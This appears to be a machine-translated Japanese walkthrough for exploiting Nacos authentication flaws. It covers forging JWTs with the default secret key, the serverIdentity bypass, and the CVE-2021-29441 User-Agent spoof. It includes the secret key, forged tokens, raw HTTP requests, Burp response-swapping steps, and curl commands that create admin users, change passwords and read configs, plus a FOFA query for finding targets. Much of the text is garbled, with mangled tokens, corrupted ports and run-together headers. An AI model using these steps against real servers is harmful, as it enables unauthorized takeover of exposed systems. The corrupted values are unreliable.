.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
NACOS脆弱性の概要の再発
1。 NACOSデフォルトキーは、ログインをバイパスする許可を引き起こします
NACOS=2.1.0に影響を与える問題がNACOSで見つかり、デフォルトのJWTキーを使用してNACOSユーザーが不正アクセスの脆弱性を引き起こしました。この脆弱性により、攻撃者はユーザー名とパスワード認証をバイパスし、NACOSユーザーに直接ログインできます。
0x00脆弱性の説明
0.1.0=NACOS=2.2.0
0x01脆弱性の影響
FOFA:app='nacos'
0x02脆弱性検索
nacosでは、token.secret.key値は固定されており、場所はアプリケーションです。
nacos.core.auth.plugin.nacos.token.secret.key=secretkey0123456789012345678901234567890123456789012345678901234567899
1.トークンを取得し、このデフォルトキーを使用してJWT構造を実行し、背景を直接入力します。建設方法:
https://jwt.io/で:デフォルトキーを入力してください:
SecretKey012345678901234567890123456789012345678901234567890123456789
次に、ペイロードを入力します。
{
'sub':' nacos '、
'exp': 1678899909
}
ここで注:1678899909の値はUNIXタイムスタンプです。変換したい場合は、システム内の現在よりも遅くなります。たとえば、現在の時刻は2023年3月15日22:11:09で、ここでのタイムスタンプ時間は3月16日です。
知らせ:
以下は、JWT値をバイパス許可に鍛造するテスト結果です
1.タイムスタンプを拡張し、パスワードを投稿するのが間違っていて、ユーザー名が正しい
2。タイムスタンプを拡張し、パスワードを投稿し、ユーザー名エラーを拡張します
3.タイムスタンプを削除してください、投稿のパスワードが間違っています、ユーザー名が間違っています
上記の値をコピーし、げっぷのログインを選択して構成します。
eyjhbgcioiijiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioijuywnvcyisimv4cci6mty3odg5otkwox0.di28cdy76jcvtmsgiim12c4pukjuobz6j6j6dstuko7s
あなたはそれを箱に自分で追加する必要があります:
POST/NACOS/V1/AUTH/USERS/LOGIN HTTP/1.1
HOST: 10.211.55.5:8848
user-agent: mozilla/5.0(Macintosh; Intel Mac OS X 10.15; RV3360104.0)Gecko/20100101 Firefox/104.0
Accept: Application/Json、Text/Plain、 */*
Accept-Language: ZH-CN、ZH; Q=0.8、ZH-TW; Q=0.7、ZH-HK; Q=0.5、EN-US; Q=0.3、EN; Q=0.2
Accept-Encoding: gzip、deflate
Content-Type:アプリケーション/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.211.55.533608848
Connection:閉じます
Referer: http://10.211.55.533608848/nacos/index.html
Authorization: Bearer eyjhbgcioiijiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioiiijuywnvcyisimv4cci6mty3odg5otkwox0.di28cdy76jcvtmsgiim12c4pukjuobz6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6dstuko7s
username=crowsecpassword=crowsec
この時点で、トークン情報を受け取りました。
HTTP/1.1 200
Vary: Origin
VARY: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
content-security-policy: script-src 'self'
set-cookie: jsessionid=d90cf6e5b233685e4a39c1b1bda9f185; path=/nacos; httponly
Authorization: Bearer eyjhbgcioiijiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioiiijuywnvcyisimv4cci6mty3odg5otkwox0.di28cdy76jcvtmsgiim12c4pukjuobz6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6j6dstuko7s
Content-Type:アプリケーション/JSON
日付:水曜日、2023年3月15日14336013:22 GMT
Connection:閉じます
Content-Length: 197
{'AccessToken':'eyjhbgcioiijiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioiijuywnvcyisimv4cci6mty3odg5otkwox0.di28c dy76jcvtmsgiim12c4pukjuuobz6j6dstuko7s '、' tokenttl':18000、 'globaladmin':true、' username':'nacos '}
この時点で、NACOSのトークン情報を受け取りました。
2。トークンを使用してログインしてバックグラウンドにログインする方法は?ここでは、偽のアカウントでログインしてから変更してパッケージに戻る必要があります。試してみてください:
最初に偽のアカウントでログインし、げっぷを使用して傍受:
これは間違いなくアクセスできません。ここで返品パッケージを変更し、右クリックしてこれを読みます:
その後、ここで返される情報は間違いなく無効です:
ここでは、今すぐ生成されたリターンパッケージを使用して、それを交換し、すべてをコピーします。
再びフォワード:
今、私はすでに入力したので:
3.デフォルトキーを使用してJWTを生成して現在のユーザー名とパスワードを表示します/nacos/v1/auth/users?accesstoken=eyjhbgcioiiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioijuywnvc yisimv4cci6mty3odg5otkwox0.di28cdy76jcvtmsgiim12c4pukjuubz6j6dstuko7spageno=1pagesize=9 http/1.1host: {{hostname}} user-agent: mozilla/5.0accept-encoding: gzip、deflateconnection: closeif-midified-since:水、2023年2月15日gmtupgrade-insecure-requests: 1accesstoken: eyjhbgcioiijiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioijuywnvcyisimv4cci6mty3odg5otkwox0.di28cdy76jcvtmsgiim12c4pukjuobz6j6dstuk7s4j6dstu7s4dstu7s.dstuko7sヘロナコス、そしてそれを正常に作成します
post/nacos/v1/auth/users http/1.1host: {{hostname}} user-agent: mozilla/5.0authorization: bearereyjhbgcioiijiuzi1niisinr5cci6ikpxvcj9.eyjzdwiioijuywnvcyisimv4cci6mty3odg5otkwox0.di28cdy76jcvtmsgiim12c4puk4pukjuobz6j6dstuko7siccechict-ecobjubz6dstuko7siccecepudipubz DeflateConnection: CloseUpgrade-Insecure-Requests: 1IF-Modified-Since:水曜日、2023年2月15日10:45:10 GMTCONTENT-TYPE3:アプリケーション/X-WWW-WWW-form-on-Length: 39
username=hellonacospassword=hellonacos
0x03脆弱性の再発
http://10.10.84.2073:8848/nacos/v1/auth/users?pageno=1pagesize=9search=quarceateaccesstokenhttp://your_ip:8848/nacos/v1/auth/?pageno=1pageno=1pageno 
2。 NACOSデフォルト構成不正アクセスの脆弱性
ServerIdentity
3。 NACOS2.2.0許可バイパス
追加ServerIdentity3
Addy ServerIdentity (dnacos.core.auth.enabled=true)、authfilterサーブレットフィルターは、認証を強制するために使用されるため、認証チェックをスキップします。このメカニズムは、ユーザーエージェントHTTPヘッダーに依存するため、簡単にスプーフィングされます。この問題により、すべてのユーザーがNACOSサーバーで管理タスクを実行できる場合があります。
iv。 Nacos1.x.xバージョンユーザーエージェント許可バイパス((CVE-2021-29441)
Docker run -D -P 8848:8848 HGLIGHT/CVE-2021-29441
0x01脆弱性の説明
NACOS=1.4.1 :010101。 http://Target:88848/nacos/v1/auth/users?pageno=1pagesize=9戻り値が200であることがわかります。
Host: 192.168.246.138:8848
user-agent: nacos-server 
または、コマンドを使用してアクセスしてください。ユーザーパスワードを読む:curl 'http://127.0.0.0.1:8848/nacos/v1/auth/users?pageno=1pagesize=9accesstoken=' -h 'user -agent: nacos-server'curl'http://127.0.0.13:8848/nacos/v1/auth/users?pageno=1pagesize=9search=blur'-h'user-agent3:nacos-server '
curl'http://127.0.0.133608848/nacos/v1/auth/users?pageno=1pagesize=9search=quarce'-h'user-agent:nacos-server'unauthorizedユーザーの追加curl-xpost'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1password=test1 '-h' user-agent:nacos-serverユーザーパスワードの変更curl-x put 'http://127.0.0.1:8848/nacos/v1/auth/users?accesstoken=' -h 'user -agent:nacos -server' -d 'username=test1newpassword=test2'read構成ファイルcurl-xget'http://127.0.0.133608848/nacos/v1/cs/configs?search=quarceatedataid=group=pageno=1pagesize=9 9'curl-xget'3http://127.0.0.1:8848/nacos/v1/cs/configs?search=bludataid=group=pageno=1pagesize=99 '
ヘッダーヘッダーを追加した後、POSTメソッドを使用してhttp://TARGET:88848/NACOS/V1/AUTH/USERS?USERNAME=VULHUBPASSWORD=valHubadd、アカウントパスワードはVulHubPost/Nacos/V1/use/users=hglightpassword=hglightpassword=hglightpassword=hglightpasswordです。
Host: 192.168.246.138:8848
user-agent: nacos-serverまたはpost/nacos/v1/auth/users http/1.1host: 192.168.31.643:88848Cache-control3360 max-age=0upgrade-insecure-Requerestess3360 1USer-agent: NACOS-Serveraccept-Encoding: GZIP、DERLATEACCEPT-LANGUAGE: ZH-CN、ZH; Q=0.9Connection: closecontent-type:アプリケーション/X-WWW-FORM-URLENCODEDEDEDEDEDCONTENT-LENGTENT-LENGTENT-LENGTEN 
ユーザーリストをもう一度表示します。返されたユーザーリストデータには、バイパス認証によって作成された追加の新しいユーザーがあります。
get/nacos/v1/auth/users/?pageno=1pagesize=9 http/1.1
Host: 192.168.246.138:8848
user-agent: nacos-server 
アクセスhttp://IP:8848/NACOSは新しいユーザーでログインします。